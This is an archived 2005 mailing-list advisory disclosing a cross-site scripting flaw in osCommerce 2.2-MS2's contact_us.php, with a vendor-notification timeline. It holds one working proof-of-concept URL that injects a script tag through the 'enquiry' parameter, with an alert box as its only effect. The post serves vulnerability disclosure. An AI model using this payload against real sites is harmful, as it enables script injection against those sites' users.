|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[NOBYTES.COM: #3] osCommerce 2.2-MS2 - XSS Vulnerability
From: John Cobb (johnc
nobytes.com)
Date: Tue Feb 15 2005 - 15:59:20 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hello All,
I have discovered XSS vulnerability in: osCommerce 2.2-MS2
Authors Site: http://www.oscommerce.com/
+-[Example:]--------------------------------------------------+
XSS:
http://www.victimsite.com/contact_us.php?&name=1&email=1&enquiry=%3C/textare
a%3E%3Cscript%3Ealert('w00t');%3C/script%3E
Result:
A nice pop up box.
+-[Notes:]----------------------------------------------------+
Vulnerabilities found on: 09/02/2005
Author(s) Informed on: 09/02/2005
Author(s) Response: None - Just sat on bug list
Author(s) Fix: - None As Of Yet
Regards
John Cobb
JohnCNoBytes.com
http://www.nobytes.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]